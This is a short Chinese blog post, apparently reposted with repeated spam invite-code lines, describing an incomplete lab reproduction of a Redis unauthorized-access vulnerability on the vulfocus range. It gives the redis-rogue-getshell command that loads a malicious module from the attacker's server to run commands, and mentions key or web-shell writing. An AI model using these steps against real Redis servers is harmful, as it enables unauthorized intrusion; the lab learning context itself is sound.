柚子快報邀請碼778899分享:redis cnvd
柚子快報邀請碼778899分享:redis cnvd
1.復(fù)現(xiàn)環(huán)境與工具
環(huán)境是在vulfocus上面
工具:GitHub - vulhub/redis-rogue-getshell: redis 4.x/5.x master/slave getshell module
參考攻擊使用方式與原理:https://vulhub.org/#/environments/redis/4-unacc/
2.復(fù)現(xiàn)
需要一個外網(wǎng)的服務(wù)器做,上傳這個工具到服務(wù)器上進入這個文件夾里面后輸入命令: python3 redis-master.py -r 目的ip -p 目的端口 -L 你的ip -P 你開放的端口?-f RedisModulesSDK/exp.so -c "id"
出了一個file,搜了一下是由于這個文件用python3寫的,要檢查一下你的服務(wù)器上是不是python版本3.0以上,用where python查python的安裝位置 ls -l 目錄/py* 得到代python的所有文件,看有沒有python3 ,他的命令是什么 參考:Linux系統(tǒng)安裝Python3環(huán)境(超詳細(xì))-騰訊云開發(fā)者社區(qū)-騰訊云
我這里是裝了的,名稱為python3
這個要先根據(jù)他github上面的內(nèi)容去做make之后再運行 python3 redis-master.py -r 目的ip -p 目的端口 -L 攻擊者ip -P 對應(yīng)端口 -f RedisModulesSDK/exp.so -c "id"redis-cli -h 123.58.224.8 -p 45635 用redis組件去連接上這個redis,之后按照我的理解來說應(yīng)該是用redis寫入公鑰連接才對:
參考redis未授權(quán)訪問-cnvd 2015-0755漏洞復(fù)現(xiàn) - FreeBuf網(wǎng)絡(luò)安全行業(yè)門戶
但是去試的時候發(fā)現(xiàn)
好像是環(huán)境有點問題,沒權(quán)限了 所以需要用寫入web的方法去做,要換工具做 要是還是想得到flag的話就參考
未授權(quán)漏洞vulfocu靶場實戰(zhàn)_vulfocus中redis未授權(quán)漏洞如何拿到falg-CSDN博客
vulfocus靶場redis 未授權(quán)訪問漏洞之CNVD-2015-07557-CSDN博客
我太懶了,實在不想重新來過了
柚子快報邀請碼778899分享:redis cnvd
文章來源
本文內(nèi)容根據(jù)網(wǎng)絡(luò)資料整理,出于傳遞更多信息之目的,不代表金鑰匙跨境贊同其觀點和立場。
轉(zhuǎn)載請注明,如有侵權(quán),聯(lián)系刪除。